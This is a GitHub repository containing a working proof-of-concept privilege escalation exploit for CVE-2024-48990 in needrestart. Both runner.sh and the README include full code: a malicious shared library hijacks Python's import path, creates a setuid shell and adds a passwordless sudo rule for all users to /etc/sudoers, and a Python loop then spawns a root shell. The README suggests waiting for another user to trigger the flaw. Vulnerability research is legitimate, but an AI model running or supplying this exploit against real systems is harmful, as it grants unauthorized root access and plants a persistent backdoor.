├── images
    ├── images.md
    └── usecase.gif
├── runner.sh
└── README.md


/images/images.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/images/usecase.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pentestfunctions/CVE-2024-48990-PoC-Testing/HEAD/images/usecase.gif


--------------------------------------------------------------------------------
/runner.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | set -e
 3 | cd /tmp
 4 | mkdir -p malicious/importlib
 5 | 
 6 | # Create and compile the malicious library
 7 | cat << 'EOF' > /tmp/malicious/lib.c
 8 | #include <stdio.h>
 9 | #include <stdlib.h>
10 | #include <sys/types.h>
11 | #include <unistd.h>
12 | 
13 | static void a() __attribute__((constructor));
14 | 
15 | void a() {
16 |     if(geteuid() == 0) {  // Only execute if we're running with root privileges
17 |         setuid(0);
18 |         setgid(0);
19 |         const char *shell = "cp /bin/sh /tmp/poc; "
20 |                             "chmod u+s /tmp/poc; "
21 |                             "grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
22 |                             "echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
23 |         system(shell);
24 |     }
25 | }
26 | EOF
27 | 
28 | gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c
29 | 
30 | # Minimal Python script to trigger import
31 | cat << 'EOF' > /tmp/malicious/e.py
32 | import time
33 | while True:
34 |     try:
35 |         import importlib
36 |     except:
37 |         pass
38 |     if __import__("os").path.exists("/tmp/poc"):
39 |         print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
40 |         __import__("os").system("sudo /tmp/poc -p")
41 |         break
42 |     time.sleep(1)
43 | EOF
44 | 
45 | cd /tmp/malicious; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
46 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2024-48990-PoC-Testing 🐍🔓
  2 | 
  3 | This repository contains a **Proof of Concept (PoC)** to demonstrate a **vulnerability in the `needrestart` program**, which fails to set Python's path correctly, leading to potential privilege escalation. The PoC highlights a potential path for gaining elevated privileges by exploiting this flaw.
  4 | 
  5 | <p align="center">
  6 |   <img src="https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing/blob/main/images/usecase.gif?raw=true">
  7 | </p>
  8 | 
  9 | ## ⚠️ Vulnerability Overview
 10 | 
 11 | The **CVE-2024-48990** vulnerability lies within the `needrestart` package. Specifically, it does not properly set Python’s path, which can be exploited to escalate privileges when triggered by certain actions. 
 12 | 
 13 | This PoC simulates a scenario where a malicious shared library is loaded via Python to manipulate system settings and gain elevated privileges. Use it in a controlled, safe environment for testing purposes only.
 14 | 
 15 | To check if you are vulnerable run:
 16 | ```
 17 | needrestart --version | grep -q "3.7" && echo "Definitely vulnerable" || echo "Version is potentially not vulnerable, this simply checks for 3.7"
 18 | 
 19 | ```
 20 | 
 21 | If you want a vulnerable version to test with simply run:
 22 | 
 23 | ```
 24 | sudo apt install needrestart=3.7-3
 25 | ```
 26 | 
 27 | ---
 28 | 
 29 | ## ⚡ How to Trigger the Vulnerability
 30 | 
 31 | To trigger the vulnerability, execute the following while you have the listener script running:
 32 | 
 33 | ```bash
 34 | sudo apt remove ntp; sudo apt install ntp
 35 | ```
 36 | 
 37 | This command installs a package (`ntp` in this case) which causes the issue with `needrestart` to be triggered however ideally you would wait for another user on the system to proc an update or something tha triggers needrestart such as sudo apt update. 
 38 | 
 39 | ---
 40 | ---
 41 | 
 42 | ## 🔨 Steps to Reproduce
 43 | 
 44 | Run the following script to set up the PoC and trigger the vulnerability, you can copy paste it directly as the whole script as is into your terminal and wait or trigger it manually as shown above with ntp. It also adds the binary to sudo path for all users for showcasing - realistcally you can just make it add all paths for sudo for your user but I wanted to show both:
 45 | 
 46 | ```bash
 47 | #!/bin/bash
 48 | set -e
 49 | cd /tmp
 50 | mkdir -p malicious/importlib
 51 | 
 52 | # Create and compile the malicious library
 53 | cat << 'EOF' > /tmp/malicious/lib.c
 54 | #include <stdio.h>
 55 | #include <stdlib.h>
 56 | #include <sys/types.h>
 57 | #include <unistd.h>
 58 | 
 59 | static void a() __attribute__((constructor));
 60 | 
 61 | void a() {
 62 |     if(geteuid() == 0) {  // Only execute if we're running with root privileges
 63 |         setuid(0);
 64 |         setgid(0);
 65 |         const char *shell = "cp /bin/sh /tmp/poc; "
 66 |                             "chmod u+s /tmp/poc; "
 67 |                             "grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
 68 |                             "echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
 69 |         system(shell);
 70 |     }
 71 | }
 72 | EOF
 73 | 
 74 | gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c
 75 | 
 76 | # Minimal Python script to trigger import
 77 | cat << 'EOF' > /tmp/malicious/e.py
 78 | import time
 79 | while True:
 80 |     try:
 81 |         import importlib
 82 |     except:
 83 |         pass
 84 |     if __import__("os").path.exists("/tmp/poc"):
 85 |         print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
 86 |         __import__("os").system("sudo /tmp/poc -p")
 87 |         break
 88 |     time.sleep(1)
 89 | EOF
 90 | 
 91 | cd /tmp/malicious; clear;echo -e "\n\nWaiting for norestart execution...\nEnsure you remove yourself from sudoers on the poc file after\nsudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers\nAs well as remove excess files created:\nrm -rf malicious/ poc"; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
 92 | ```
 93 | 
 94 | ## 💥 Cleanup Script
 95 | 
 96 | If you'd like to clean up testing files and remove yourself from `sudoers`, you can run the following from an elevated prompt:
 97 | 
 98 | ```bash
 99 | sudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers
100 | rm -rf malicious/ poc; ls
101 | ```
102 | 
103 | ---
104 | 
105 | ## 🛠️ Requirements
106 | 
107 | - **Linux-based system** (Ubuntu/Debian recommended)
108 | - **`needrestart` package** installed (or removed and reinstalled to trigger)
109 | - **Python 3.x** installed (for running the Python script)
110 | 
111 | ---
112 | 
113 | ## 🚨 Warning
114 | 
115 | This PoC is for **testing purposes only** and should not be used in a production environment. Exploiting this vulnerability in unauthorized environments may be illegal. Always obtain explicit permission before conducting any security testing.
116 | 
117 | ---
118 | 
119 | ## 🔗 Resources
120 | 
121 | - GitHub Repository: [CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC/)
122 | - CVE Details: [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)
123 | 
124 | ---
125 | 
126 | Happy testing! 🧪🚀
127 | 


--------------------------------------------------------------------------------